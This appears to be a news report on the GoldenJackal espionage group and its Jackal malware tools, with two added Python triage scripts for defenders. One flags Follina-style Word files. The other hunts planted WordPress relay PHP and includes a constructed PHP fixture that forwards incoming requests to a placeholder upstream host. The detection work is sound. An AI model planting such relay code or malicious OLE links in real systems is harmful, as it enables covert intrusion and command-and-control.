A sophisticated, previously undocumented advanced persistent threat (APT) actor tracked as GoldenJackal is targeting government and diplomatic entities in the Middle East and South Asia. The adversary has been observed since mid-2020 by the Russian cybersecurity firm Kaspersky, which described it as both capable and stealthy.
The campaign primarily targets Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with malware built to steal data, propagate between machines via removable drives, and conduct surveillance. Although little is known about the group, GoldenJackal is believed to have been active for at least four years. While the actor's modus operandi points to an espionage motive, Kaspersky said it has been unable to determine the group's origin or link it to any known threat actor.
The actor's efforts to keep a low profile and blend into the background also bear the hallmarks of a state-sponsored group. That said, significant tactical overlaps have been noted with Turla, one of Russia's elite nation-state hacking crews. In one instance, GoldenJackal and Turla infected the same target machine two months apart.
Exactly how the targeted machines are initially breached remains unclear, but the evidence points to malicious Microsoft Word documents and trojanized Skype installers. The Word documents have been seen weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware that the trojanized installer delivers: a .NET-based trojan known as JackalControl.
As the name implies, JackalControl lets the operators remotely commandeer the device, execute arbitrary commands, and upload and download files to and from the system. Other malware families in GoldenJackal's toolkit include:
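Follina documents of the kind described above carry their trigger in the document's OOXML relationships rather than in a macro, so a triage check can be done without opening the file in Word. The scanner below is an added example written for this article, not code from Kaspersky's report; it applies two traits of the publicly analysed Follina maldocs: an oleObject relationship in word/_rels/document.xml.rels whose Target is an external http(s) URL, and any occurrence of the ms-msdt: URI scheme inside the package. The sample document it inspects is constructed in memory (the hostname example.invalid is a placeholder), so the script runs offline.

```python
"""Heuristic triage for Follina-style (CVE-2022-30190) .docx files.

Added example, not from the original article or Kaspersky's report.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Relationship type Word uses for embedded/linked OLE objects.
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# The troubleshooter protocol handler abused by Follina.
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)
HTTP_RE = re.compile(r"(?i)^https?://")


def scan_docx(data):
    """Return a list of findings for a .docx given as bytes (empty if nothing matched)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # 1. Any .rels part: look for an OLE object whose target is a remote URL.
        for name in names:
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter():
                if not rel.tag.endswith("Relationship"):
                    continue
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_REL
                        and rel.get("TargetMode") == "External"
                        and HTTP_RE.match(target)):
                    findings.append("%s: external OLE object -> %s" % (name, target))
        # 2. Every part: an embedded ms-msdt: reference is never legitimate in a document.
        for name in names:
            if MSDT_RE.search(zf.read(name)):
                findings.append("%s: references ms-msdt: URI scheme" % name)
    return findings


def build_sample_docx(external_target=None):
    """Construct a minimal .docx in memory (constructed fixture, not a real maldoc).

    When `external_target` is given, an external oleObject relationship pointing
    at it is added, mirroring the Follina delivery technique.
    """
    rels = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">',
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>',
    ]
    if external_target:
        rels.append('<Relationship Id="rId2" Type="%s" Target="%s" TargetMode="External"/>'
                    % (OLE_REL, external_target))
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", "\n".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host; a real sample would point at attacker-controlled HTML.
    for hit in scan_docx(build_sample_docx("http://example.invalid/x.html!")):
        print(hit)
```

The external-target check is deliberately narrow: Word documents legitimately carry relationships to remote resources (linked images, hyperlinks), so only OLE object relationships with a remote target are flagged. Run it over a mail gateway's quarantined attachments or a forensic image, and treat any hit as worth a sandbox detonation rather than a verdict on its own.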
- JackalSteal – an implant that searches for important files, including those on removable USB drives, and sends them to a remote server.
- JackalWorm – a worm designed to install the JackalControl malware on PCs via removable USB drives.
- JackalPerInfo – a malicious program able to gather information about the system, folder contents, installed programs, and running processes, as well as credentials stored in web browser databases.
- JackalScreenWatcher – a utility that takes screenshots at a predetermined interval and sends them to an actor-controlled server.
Another noteworthy characteristic of the threat actor is its reliance on compromised WordPress websites as relays: a malicious PHP file inserted into the site forwards web requests to the real command-and-control (C2) server, keeping the actor's own infrastructure one hop removed from the victim. "The group is probably trying to reduce its visibility by limiting the number of victims," said Giampaolo Dedola, a researcher at Kaspersky. "Their toolkit seems to be under development – the number of variants shows that they are still investing in it."
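For a WordPress operator or responder, the relay described above is a hunt for a PHP file that has no business being where it is and that turns inbound requests into outbound connections. The scanner below is an added example and not code from the article or Kaspersky's report; the exact relay file is not described here, so it applies two generic heuristics rather than a signature: PHP files under wp-content/uploads (WordPress never writes PHP there), and PHP that both reads the incoming request (php://input, superglobals, getallheaders) and opens a raw outbound connection (curl, sockets, or file_get_contents over http). The WordPress tree it walks, including a constructed relay fixture pointing at the placeholder host upstream.example.invalid, is written to a temporary directory so the script runs offline.

```python
"""Hunt for request-relay PHP planted in a WordPress install.

Added example, not from the original article or Kaspersky's report.
"""
import os
import re
import tempfile

# Reads the inbound HTTP request.
INBOUND_RE = re.compile(r"php://input|\$_(?:POST|GET|REQUEST|SERVER)\b|getallheaders\s*\(")
# Raw outbound primitives; the WordPress HTTP API (wp_remote_*) is deliberately
# excluded because legitimate plugins use it constantly.
OUTBOUND_RE = re.compile(
    r"\bcurl_(?:init|exec)\s*\(|\bfsockopen\s*\(|\bstream_socket_client\s*\(|"
    r"file_get_contents\s*\(\s*['\"]https?://"
)


def scan_wordpress(root):
    """Walk `root` and return sorted (relative_path, reason) tuples for suspicious PHP files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, fname)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if rel.startswith("wp-content/uploads/"):
                findings.append((rel, "PHP in uploads directory"))
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if INBOUND_RE.search(src) and OUTBOUND_RE.search(src):
                findings.append((rel, "reads request and makes raw outbound connection"))
    return sorted(findings)


# Constructed fixture: two benign files and one relay-style file.
SAMPLE_FILES = {
    # Benign: reads the request but makes no outbound call.
    "wp-login.php": "<?php $user = $_POST['log']; wp_signon(array('user_login' => $user));",
    # Benign: outbound call through the WordPress HTTP API, no request forwarding.
    "wp-content/plugins/demo/demo.php": "<?php $r = wp_remote_get('https://api.example.invalid/v1/status');",
    # Constructed relay: forwards the raw request body to a hardcoded upstream.
    "wp-content/uploads/2023/05/cache.php": (
        "<?php $body = file_get_contents('php://input');\n"
        "$ch = curl_init('http://upstream.example.invalid/gate');\n"
        "curl_setopt($ch, CURLOPT_POSTFIELDS, $body);\n"
        "curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n"
        "echo curl_exec($ch);"
    ),
}


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reason in scan_wordpress(build_sample_tree()):
        print("%s: %s" % (rel, reason))
```

Both heuristics produce false positives on real sites (a backup plugin that proxies downloads, for instance), so pair each hit with file mtime, the web server's access log for that path, and a diff against a clean copy of the plugin or theme before declaring a compromise.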